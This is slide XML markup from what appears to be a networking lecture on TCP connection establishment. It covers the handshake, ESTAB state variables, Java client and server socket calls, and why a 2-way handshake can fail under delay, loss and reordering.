            <a:ext cx="11329310" cy="218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before exchanging data, sender/receiver “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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handshake”: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agree to establish connection (each knowing the other willing to establish connection)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agree on connection parameters (e.g., starting seq #s)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BF2F5EC-BDDB-E717-F7BF-C7E34E0B9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677" y="2935290"/>
            <a:ext cx="2279650" cy="2414588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" name="Rectangle 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7815AC17-8D3F-1D27-ADDD-516C6155C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989" y="2989265"/>
            <a:ext cx="2270125" cy="2471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" name="Line 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C1A7952-2C48-387D-E0BC-AE8106F53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8989" y="3430590"/>
            <a:ext cx="227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C8FCC85B-D613-B131-13AB-2E7A2BF5D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3277" y="3543303"/>
            <a:ext cx="2335212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230188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state: ESTAB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variables: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seq # client-to-server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server-to-client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rcvBuffer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size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at server,client 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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA1170E4-A70C-8D95-741C-85E6061323FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3979492" y="3344865"/>
            <a:ext cx="438150" cy="206375"/>
            <a:chOff x="344" y="1846"/>
            <a:chExt cx="336" cy="130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33CED086-467A-5CF0-3D34-95959143E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" name="Rectangle 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7BD1519-8044-0A34-E4E6-45F9B12FA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863"/>
              <a:ext cx="112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" name="Rectangle 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A921746-963D-0CC4-09DB-6E451AC66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" name="Rectangle 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EEB1E60-7AE6-4FCF-07F6-6015424A6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5" name="Text Box 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C5DD005-61EA-3B35-789B-897F4F758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7081" y="3006443"/>
            <a:ext cx="1146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application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Line 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49E7CB47-8C72-5554-8FAD-E54A4A193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5339" y="4926015"/>
            <a:ext cx="22685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7" name="Text Box 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46E85D84-C109-2AEE-5A5E-8CE5C906A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3658" y="5021176"/>
            <a:ext cx="908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network</a:t>
            </a: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20930BC6-7F20-C58E-BE55-57EC817EE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414" y="5348290"/>
            <a:ext cx="2335213" cy="180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" name="Line 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80E486DA-8EEA-B034-755E-F4B5F5219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8989" y="5337178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Line 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6461CEBD-6C22-F71D-8734-BBAA1A54B4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2764" y="5308603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A8E9A67C-0E81-4A11-3EA8-396D109E0AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2625914" y="2992440"/>
            <a:ext cx="468313" cy="249078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63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C993163A-8EB8-49ED-DAB5-D618085A9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802" y="2941640"/>
            <a:ext cx="2279650" cy="2414588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" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E132F27A-141A-972E-E1AB-450D77E3C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1114" y="2995615"/>
            <a:ext cx="2270125" cy="2471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Line 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E67DDD7-4C97-7392-4DAC-23B6F0C03F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1114" y="3436940"/>
            <a:ext cx="227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" name="Text Box 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C4D33F-C9E9-F8DB-5E55-915BCF6E9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402" y="3549653"/>
            <a:ext cx="2335212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230188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state: ESTAB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Variables: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seq # client-to-server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server-to-client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rcvBuffer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size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at server,client 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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8728A37-7B1E-2A6C-0487-1261364A0505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8308511" y="3351215"/>
            <a:ext cx="438150" cy="206375"/>
            <a:chOff x="344" y="1846"/>
            <a:chExt cx="336" cy="130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rectangle 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FB0A568-3D7B-208E-79FC-CF4399960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Rectangle 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771298BD-EB69-7EB1-4898-DA38C4150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863"/>
              <a:ext cx="112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" name="Rectangle 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF00B559-C4D3-BF82-08B7-88241F2DD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Rectangle 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29DF1152-7C2C-725E-B33F-D23CABE6B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1" name="Text Box 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4A62A7-6AF4-0DC5-0917-E8C29E805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3246" y="3024051"/>
            <a:ext cx="1146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application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Line 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6A70041-D1AB-B24C-385B-C6571F846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7464" y="4932365"/>
            <a:ext cx="22685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" name="Text Box 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F98F677-F1D9-42F6-C1E2-36DEB331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953" y="5013813"/>
            <a:ext cx="908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network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6CEDC2-38BB-87EB-1926-3FFAB13B6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539" y="5354640"/>
            <a:ext cx="2335213" cy="180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5" name="Line 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{483D6750-A6E9-9CCF-2CBA-BC55FE5BF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1114" y="5343528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6" name="Line 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A7A23D-D12C-B421-CB51-0B8A907F2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4889" y="5314953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7" name="Freeform 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E838C953-DB6D-1034-48CC-51277F60AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9682352" y="2932115"/>
            <a:ext cx="468312" cy="249078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Text Box 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4C74AAC-DAD3-398B-835A-46A8664CB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46" y="5759648"/>
            <a:ext cx="56333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1775" indent="-231775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Socket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clientSocket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=   </a:t>
            </a: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newSocket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("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hostname","port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number");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text Box 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04078E31-FBF5-C645-EB49-B90394ABC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795" y="5773144"/>
            <a:ext cx="41595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1775" indent="-231775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Socket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connectionSocket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=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welcomeSocket.accept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();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Group 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A24C11-3AD6-36A6-6667-733701FD2022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2149664" y="5024440"/>
            <a:ext cx="698500" cy="612775"/>
            <a:chOff x="-44" y="1473"/>
            <a:chExt cx="981" cy="1105"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="Picture 90" descr="desktop_computer_stylized_medium">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386BBE8-5565-C7A4-DA46-D30B4DCDE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91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E2644E4-ABFC-5734-5FD5-81BBE11CD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3" name="Group 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{127F8465-A73C-8251-E4BA-5FEBC17832E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9964927" y="4922840"/>
            <a:ext cx="415925" cy="627063"/>
            <a:chOff x="4140" y="429"/>
            <a:chExt cx="1425" cy="2396"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Freeform 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0AB5A4-5A34-3537-0E53-73B6B2423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Rectangle 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F1EF7E-F428-4466-09A3-F3A2FC27D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50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6" name="Freeform 95">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{052A6856-C9A0-A948-BFA1-FCB7C1AEA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Freeform 96">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DB6B0C2-9228-BAEC-AB0D-6957E99F3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Rectangle 97">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39147330-4550-9847-548A-E2CAAE910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6"/>
              <a:ext cx="598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9" name="Group 98">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12CA79BE-B0D7-AA5E-6F17-C42A65623A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4" name="AutoShape 99">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01401DFC-AE87-57AA-73AC-610EABB38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" name="AutoShape 100">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{489B4DEF-791E-CD08-453F-C0329D997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0" name="Rectangle 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA7C2858-2772-21CA-9F6F-3F011F270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8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1" name="Group 102">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88050C3E-9D87-3B17-713F-8FC5FA5A0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" name="AutoShape 103">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78591940-3104-8BA5-637A-1F0572AF4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" name="AutoShape 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69586C4E-DE08-9D40-F59D-1A81754A8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7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2" name="Rectangle 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{131CEF7B-96DC-2AB3-8B7C-2B5BA8234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8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3" name="Rectangle 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1D21EED-78BD-780E-F293-EE9E0CD49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8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4" name="Group 107">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ACCA327-04C9-A544-9960-A6E1F657C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" name="AutoShape 108">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21C6CBA8-5F13-92D5-107E-7D1A45C17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25" cy="123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1" name="AutoShape 109">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E4B5F6-4FA8-223C-5212-20D89C8BA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1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37515F04-FFE3-06D9-9238-1AF8B68BB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6" name="Group 111">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5396A6B3-AD57-6207-F5E2-30D0533071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" name="AutoShape 112">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC5380A9-F789-95C1-8293-CB1322C57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5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9" name="AutoShape 113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D8CC02-25FD-7855-F2AA-99EE8A48B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1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7" name="Rectangle 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{808BD85B-7ED5-5A49-82B0-B75E163D7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" name="Freeform 115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A31DFE3-C923-26FA-5A63-BB61D5151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Freeform 116">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961208A1-5384-F7EC-BE37-415AA280A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117">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780F5882-C267-C27E-4B62-ACD1B317E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3"/>
              <a:ext cx="49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" name="Freeform 118">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41219117-D163-45DE-59A7-8C8B5B4D1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AutoShape 119">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6911A54-3E75-9F2C-D42D-B8BA3F2FF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7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AutoShape 120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ACC3D60-2740-D454-979F-CCA249116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0"/>
              <a:ext cx="1071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Oval 121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2465CCB-06C2-A574-C311-8B63C8E5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5" name="Oval 122">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0CB294B-9985-73E4-1F47-ACE39F0E2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Oval 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D0E761-6C0B-8FD7-E685-3DC865F10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7" name="Rectangle 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD786FB4-C783-56EA-7ADF-1CAE00AA1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836"/>
              <a:ext cx="82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4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831AA6-84AC-9B25-9E61-9D14E21D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Agreeing to establish a connection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DE59B-E49E-4D37-6B9C-0207A433E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526F443D-EFDA-B5DB-B38F-F12A078F1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0737" y="2295084"/>
            <a:ext cx="5523920" cy="3576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sng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Q:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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 will 2-way handshake always work in network?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" marR="0" lvl="0" indent="-2794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variable delays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" marR="0" lvl="0" indent="-2794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retransmitted messages (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="28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req_conn</a:t>
            </a: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(x)) due to message loss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" marR="0" lvl="0" indent="-2794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message reordering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" marR="0" lvl="0" indent="-2794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c</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="28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an’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP" sz="28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t</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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 “see” other side</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 62" descr="Alice">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99B3C27-1A1A-276A-FF0F-163DE84D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08" y="2031271"/>
            <a:ext cx="685440" cy="68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3" descr="Bob">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59BA966F-49DE-2B9F-064C-38B33142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00" y="2069246"/>
            <a:ext cx="839663" cy="69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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65ACF8F6-D1C6-46CC-C88B-05C549412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913" y="1354621"/>
            <a:ext cx="32079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2-way handshake:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Line 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CCBBC7D-4531-E71D-E5D7-8AF7EEA836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0097" y="2827024"/>
            <a:ext cx="1996343" cy="343504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0" name="Line 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38AF6842-6B78-B09B-FA7B-489D1928F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0121" y="2737265"/>
            <a:ext cx="0" cy="119104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1" name="Line 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9B73EA-3ADF-66BA-9870-00DD675D8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5008" y="2766610"/>
            <a:ext cx="0" cy="119104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2" name="Line 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3911D93-5FE2-63C2-A642-3678732FDB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45837" y="3258561"/>
            <a:ext cx="1996343" cy="343504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3" name="Rectangle 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DB13894-E372-6C50-6788-C3F08E74F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397" y="2811490"/>
            <a:ext cx="1201662" cy="3555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4" name="Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FBFD103-1C32-5D99-60CD-8BA962130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217" y="2787324"/>
            <a:ext cx="111601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Let’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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talk</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US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22742F32-3D66-5320-EBAB-178C8670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401" y="3272370"/>
            <a:ext cx="593334" cy="3555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874B531A-4336-3E74-CBD5-10CFD5BA6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186" y="3248204"/>
            <a:ext cx="48763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OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Box 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7748A9D-12CD-3690-4109-BFA64DF9C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992" y="3066959"/>
            <a:ext cx="8418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ESTAB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Box 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB04BFE-88F3-C2CD-F019-443870B89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998" y="3429450"/>
            <a:ext cx="8418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ESTAB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91B7EC9A-01BE-D604-1463-4A32D7DA1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004" y="3557185"/>
            <a:ext cx="122093" cy="96664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0" name="Oval 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC9B9BF-367E-B8AE-15FC-08635AA48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0748" y="3184337"/>
            <a:ext cx="122095" cy="96664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1" name="Text Box 72">
            <a:extLst>
